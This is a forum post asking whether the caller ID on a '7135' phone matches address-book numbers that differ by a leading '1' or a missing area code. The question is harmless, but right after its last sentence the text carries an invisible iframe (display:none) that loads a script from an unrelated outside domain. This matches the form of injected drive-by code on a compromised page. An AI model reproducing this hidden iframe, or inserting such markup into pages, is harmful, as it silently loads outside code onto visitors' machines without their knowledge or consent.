Caller ID
I was wondering how "smart" the caller ID is on the 7135... For example, I have the Samsung 3500 now, and even though I have a name in my address book, sometimes the number still comes up in the caller id instead of the name. I think that it has to do with the phone number not matching exactly. For example, in the phone book the phone number might have a "1" before the area code, but the number displayed from the caller id might not. This is probably not considered a match. Is the caller ID on the 7135 smart enough to know that 1-888-555-1212 is the same as 888-555-1212? Also, will it take into account the area code set in the preferences (if there is the option for one) if a number in the address book doesn't have an area code?
I searched through the threads, but didn't find anything similar to this. I apologize if this is a repeat question.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
